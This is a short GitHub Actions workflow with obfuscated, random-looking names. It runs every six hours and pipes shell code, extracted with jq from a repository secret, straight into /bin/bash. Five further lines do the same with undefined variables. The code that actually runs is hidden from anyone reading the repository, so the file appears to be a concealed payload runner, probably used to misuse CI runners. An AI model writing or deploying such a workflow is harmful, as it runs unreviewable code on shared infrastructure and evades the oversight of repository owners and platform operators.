name: strengthteammate

on:
  workflow_dispatch:
  schedule:
    - cron: '40 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: strengthteammate
        env:
          nmuq7: ${{ secrets.nmuq7 }}
        run: |
          echo $nmuq7 | jq -r .q39 | /bin/bash
          echo $oxd7087 | jq -r .gbhk93323 | /bin/bash
          echo $d02 | jq -r .b7 | /bin/bash
          echo $r16157 | jq -r .lrjfq2315 | /bin/bash
          echo $lgzj515 | jq -r .fv77 | /bin/bash
          echo $dpoo79820 | jq -r .ws38 | /bin/bash

